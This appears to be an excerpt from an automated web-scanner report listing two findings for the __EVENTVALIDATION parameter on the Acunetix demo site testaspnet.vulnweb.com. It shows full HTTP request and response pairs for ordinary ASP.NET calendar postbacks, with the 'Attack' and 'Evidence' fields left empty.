Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1117 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,117 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8470&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBAmebnGdsIHgJTRBYBBgDAuo7DIdsIZGRkSkBiNA%2BreMUafInQRzuFxdsgVnc%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKm%2FfHfCQLRp67yDgLQp%2BbjBwLcy%2BvqAgLcy%2BvqAgLcy9%2FTDwLcy9%2FTDwLcy%2FP2CALcy%2FP2CAKx0t2fCgKx0t2fCgKx0vGyAwKx0vGyAwKx0uXJDAKx0uXJDAKx0pnsBQKx0pnsBQKx0o2DDQKx0o2DDQKx0qGmBgKx0qGmBgKx0tX6DwKx0tX6DwKx0smRBwKx0smRBwKx0r35BQKx0r35BQKx0tGdDQKx0tGdDQKK%2BaMFAor5owUCivnX2QkCivnX2QkCivnL%2FAICivnL%2FAICivn%2FkwoCivn%2FkwoCivmTtgMCivmTtgMCivmHzQwCivmHzQwCivm74AUCivm74AUCivmvhw0Civmvhw0CivmD7AsCivmD7AsCivm3gwMCivm3gwMCv5PjxAkCv5PjxAkCv5OXmwECv5OXmwECv5OLvgoCv5OLvgoCv5O%2F1QMCv5O%2F1QMCv5PT6QwCv5PT6QwCv5PHjAQCv5PHjAQCv5P7ow0Cv5P7ow0Cv5PvxgYCv5PvxgYCv5PDrwMCv5PDrwMCv5P3wgwCv5P3wgwCkLrB6w8CkLrB6w8CkLr1jgcCkLr1jgcCkLrpJQKQuuklApC6nfgJApC6nfgJApC6sZ8BApC6sZ8BApC6pbIKApC6pbIKApC62dYDApC62dYDApC6ze0MApC6ze0MApC6odUJApC6odUJy1QdssyH7Z%2BPhr%2Fxz7uTaCDVt%2Bo%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:22:07 GMT Content-Length: 12504
Response Body - size: 12,504 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBAmebnGdsIHgJTRBYBBgDAuo7DIdsIZGRkSkBiNA+reMUafInQRzuFxdsgVnc=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKm/fHfCQLRp67yDgLQp+bjBwLcy+vqAgLcy+vqAgLcy9/TDwLcy9/TDwLcy/P2CALcy/P2CAKx0t2fCgKx0t2fCgKx0vGyAwKx0vGyAwKx0uXJDAKx0uXJDAKx0pnsBQKx0pnsBQKx0o2DDQKx0o2DDQKx0qGmBgKx0qGmBgKx0tX6DwKx0tX6DwKx0smRBwKx0smRBwKx0r35BQKx0r35BQKx0tGdDQKx0tGdDQKK+aMFAor5owUCivnX2QkCivnX2QkCivnL/AICivnL/AICivn/kwoCivn/kwoCivmTtgMCivmTtgMCivmHzQwCivmHzQwCivm74AUCivm74AUCivmvhw0Civmvhw0CivmD7AsCivmD7AsCivm3gwMCivm3gwMCv5PjxAkCv5PjxAkCv5OXmwECv5OXmwECv5OLvgoCv5OLvgoCv5O/1QMCv5O/1QMCv5PT6QwCv5PT6QwCv5PHjAQCv5PHjAQCv5P7ow0Cv5P7ow0Cv5PvxgYCv5PvxgYCv5PDrwMCv5PDrwMCv5P3wgwCv5P3wgwCkLrB6w8CkLrB6w8CkLr1jgcCkLr1jgcCkLrpJQKQuuklApC6nfgJApC6nfgJApC6sZ8BApC6sZ8BApC6pbIKApC6pbIKApC62dYDApC62dYDApC6ze0MApC6ze0MApC6odUJApC6odUJy1QdssyH7Z+Phr/xz7uTaCDVt+o=" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8432')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">March 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8491')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8457')" style="color:Black" title="February 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8458')" style="color:Black" title="February 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8459')" style="color:Black" title="February 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8460')" style="color:Black" title="March 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8461')" style="color:Black" title="March 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8462')" style="color:Black" title="March 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8463')" style="color:Black" title="March 04">4</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8464')" style="color:Black" title="March 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8465')" style="color:Black" title="March 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8466')" style="color:Black" title="March 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8467')" style="color:Black" title="March 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8468')" style="color:Black" title="March 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8469')" style="color:Black" title="March 10">10</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8470')" style="color:White" title="March 11">11</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8471')" style="color:Black" title="March 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8472')" style="color:Black" title="March 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8473')" style="color:Black" title="March 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8474')" style="color:Black" title="March 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8475')" style="color:Black" title="March 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8476')" style="color:Black" title="March 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8477')" style="color:Black" title="March 18">18</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8478')" style="color:Black" title="March 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8479')" style="color:Black" title="March 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8480')" style="color:Black" title="March 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8481')" style="color:Black" title="March 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8482')" style="color:Black" title="March 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8483')" style="color:Black" title="March 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8484')" style="color:Black" title="March 25">25</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8485')" style="color:Black" title="March 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8486')" style="color:Black" title="March 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8487')" style="color:Black" title="March 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8488')" style="color:Black" title="March 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8489')" style="color:Black" title="March 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8490')" style="color:Black" title="March 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8491')" style="color:Black" title="April 01">1</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8492')" style="color:Black" title="April 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8493')" style="color:Black" title="April 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8494')" style="color:Black" title="April 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8495')" style="color:Black" title="April 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8496')" style="color:Black" title="April 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8497')" style="color:Black" title="April 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8498')" style="color:Black" title="April 08">8</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1063 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,063 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8379&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgIeAlNEFgEGAIAje0Ha2ghkZGQ8OOYv%2BUfYv48ocjatybkLtDU3YA%3D%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKM38ihBAL%2BkPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK%2Bb8FAor5vwUCivnT2QkCivnT2QkCivnH%2FAICivnH%2FAICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P%2FxAkCv5P%2FxAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBKqFHMOff2%2Bz9Ql0Baxq4z1jQaOR
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:15:59 GMT Content-Length: 12607
Response Body - size: 12,607 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgIeAlNEFgEGAIAje0Ha2ghkZGQ8OOYv+UfYv48ocjatybkLtDU3YA==" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKM38ihBAL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBKqFHMOff2+z9Ql0Baxq4z1jQaOR" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:White" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
